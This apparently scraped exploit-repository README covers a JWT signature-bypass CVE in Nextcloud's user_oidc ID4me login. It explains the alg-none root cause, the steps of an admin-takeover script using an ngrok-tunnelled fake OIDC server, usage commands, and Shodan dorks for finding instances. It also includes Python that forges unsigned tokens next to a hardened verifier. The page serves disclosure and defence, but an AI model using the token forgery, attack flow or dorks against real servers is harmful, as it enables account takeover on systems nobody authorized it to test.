## https://sploitus.com/exploit?id=C0FC9086-8648-5BF4-BFEE-F541B2675907
# CVE-2026-45156: Nextcloud user_oidc ID4me JWT Signature Bypass
This repository contains the Proof of Concept (PoC) exploit script for **CVE-2026-45156**, a critical authentication bypass vulnerability in the Nextcloud `user_oidc` application.
## Vulnerability Details
* **CVE ID:** CVE-2026-45156
* **Advisory:** [GHSA-qqgv-fqwp-mjpp](https://github.com/nextcloud/security-advisories/security/advisories/GHSA-qqgv-fqwp-mjpp)
* **Vulnerability:** Improper Verification of Cryptographic Signature (CWE-347)
* **Affected Component:** Nextcloud `user_oidc` app (ID4me login functionality)
* **Impact:** Critical (Authentication Bypass leading to Admin Takeover)
* **Root Cause:** `Id4meController.php` decodes the ID token's payload with `base64_decode()` and trusts its claims without verifying the JWT signature, so a token with `alg: none` and an empty signature segment is accepted as if it came from the ID4me authority.
Read the full technical deep-dive and story here: [Link to your blog post]
## Exploit Script
The `nextcloud_id4me_poc.py` script automates the exploitation process. It:
1. Detects the target Nextcloud instance.
2. Extracts the necessary CSRF token (`requesttoken`).
3. Checks if the `user_oidc` app and ID4me endpoints are active.
4. Forges a malicious JWT token (`alg: none`, empty signature) for the specified target user (default: `admin`).
5. Sets up a local fake OIDC authority server.
6. Tunnels the local server to the internet using `ngrok`.
7. Executes the ID4me login flow, injecting the forged token.
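The two sides of the bug in one place, as an added example that is not part of this repository or of Nextcloud's code: `forge_alg_none_jwt()` builds the kind of unsigned token step 4 describes, `naive_decode()` mirrors the root cause (split the token, base64-decode the payload, trust the claims), and `verify_jwt()` shows what a consuming application must do instead. The issuer, audience and key are constructed values; the hardened path uses HS256 with a shared key so the block runs on the standard library alone, which is an assumption for illustration only (a real OIDC relying party checks RS256/ES256 signatures against the provider's JWKS, and this block makes no claim about how the Nextcloud fix is implemented).

```python
import base64
import hashlib
import hmac
import json
import time


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as JWT (RFC 7515) requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Base64url decode, restoring the padding JWT strips."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def forge_alg_none_jwt(sub: str, iss: str, aud: str, lifetime: int = 600) -> str:
    """Attacker side: an ID token with alg 'none' and an empty signature segment.

    No key material is needed, only the claims the consuming app will trust.
    """
    header = {"alg": "none", "typ": "JWT"}
    now = int(time.time())
    payload = {"iss": iss, "sub": sub, "aud": aud, "iat": now, "exp": now + lifetime}
    segments = [b64url_encode(json.dumps(p, separators=(",", ":")).encode()) for p in (header, payload)]
    return ".".join(segments) + "."  # trailing dot: empty third segment


def naive_decode(token: str) -> dict:
    """Vulnerable pattern: base64-decode the payload and trust whatever it says.

    This mirrors the root cause described above (base64_decode() with no
    signature check). Any well-formed JWT is accepted, forged or not.
    """
    _header, payload, _sig = token.split(".")
    return json.loads(b64url_decode(payload))


def verify_jwt(token: str, key: bytes, expected_iss: str, expected_aud: str) -> dict:
    """Hardened pattern: pin the algorithm, verify the signature, then check claims."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
    except ValueError:
        raise ValueError("malformed token")
    header = json.loads(b64url_decode(header_b64))
    # 1. The token never chooses its own algorithm; 'none' fails here.
    if header.get("alg") != "HS256":
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    # 2. Recompute the MAC over header.payload and compare in constant time.
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    if not sig_b64 or not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    # 3. Only now read the claims, and bind them to this issuer and audience.
    claims = json.loads(b64url_decode(payload_b64))
    if claims.get("iss") != expected_iss or claims.get("aud") != expected_aud:
        raise ValueError("wrong issuer or audience")
    if claims.get("exp", 0) < time.time():
        raise ValueError("token expired")
    return claims


def sign_hs256_jwt(claims: dict, key: bytes) -> str:
    """Reference signer, so the hardened verifier can be shown accepting a genuine token."""
    header_b64 = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload_b64 = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    return f"{header_b64}.{payload_b64}.{b64url_encode(sig)}"


def demo() -> dict:
    """Run a forged token through both decoders and a genuine one through the verifier."""
    issuer = "https://fake-authority.example"  # constructed; stands in for the tunnelled fake server
    audience = "nextcloud-client-id"           # constructed
    key = b"constructed-demo-key-not-real"     # constructed
    forged = forge_alg_none_jwt("admin", issuer, audience)

    naive_sub = naive_decode(forged)["sub"]    # vulnerable path yields "admin"
    try:
        verify_jwt(forged, key, issuer, audience)
        strict_rejected = False
    except ValueError:
        strict_rejected = True                 # hardened path rejects alg 'none'

    now = int(time.time())
    genuine = sign_hs256_jwt({"iss": issuer, "sub": "alice", "aud": audience, "iat": now, "exp": now + 600}, key)
    genuine_sub = verify_jwt(genuine, key, issuer, audience)["sub"]
    return {"naive_sub": naive_sub, "strict_rejected": strict_rejected, "genuine_sub": genuine_sub}


if __name__ == "__main__":
    print(demo())
```

The order inside `verify_jwt()` is the point: algorithm pinning and signature verification happen before any claim is read, so a payload the attacker controls never influences which check runs.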
### Prerequisites
* Python 3.x
* `requests` library
* `pyngrok` library
* An active `ngrok` account and auth token.
```bash
pip install requests pyngrok
ngrok config add-authtoken <YOUR_NGROK_AUTHTOKEN>
```
### Usage
```bash
python nextcloud_id4me_poc.py <target_url> [--user <username>] [--port <port>]
```
* `<target_url>`: The URL of the target Nextcloud instance (e.g., `https://example.com`).
* `--user`: The username to impersonate (default: `admin`).
* `--port`: The local port for the fake OIDC server (default: `9999`).
**Example:**
```bash
python nextcloud_id4me_poc.py https://target.lab --user admin
```
## Reconnaissance (Shodan Dorks)
To identify potentially vulnerable Nextcloud instances that have the `user_oidc` application installed, you can use the following Shodan dorks.
*Note: Having the app installed does not automatically mean the target is vulnerable, as it must be configured and unpatched.*
**Find Nextcloud instances with OIDC/ID4me active:**
```text
title:"Nextcloud" http.html:"user_oidc"
```
```text
title:"Nextcloud" http.html:"id4me"
```
```text
http.title:"Nextcloud" http.html:"/apps/user_oidc/"
```
*Reminder: Only test systems you have explicit permission to audit.*
## Legal Disclaimer
⚠️ **WARNING: This PoC is provided for EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.**
This script is intended for security researchers and bug bounty hunters to test systems they have explicit permission to audit. Any unauthorized use of this tool against systems you do not own or have explicit, documented permission to test is strictly prohibited and may violate local, state, and federal laws.
The author assumes no liability and is not responsible for any misuse or damage caused by this program. By using this software, you agree to use it responsibly and in accordance with all applicable laws.
## Credits
* Discovered by: **CyberTechAjju**
* HackerOne Report: [#3489490](https://hackerone.com/reports/3489490)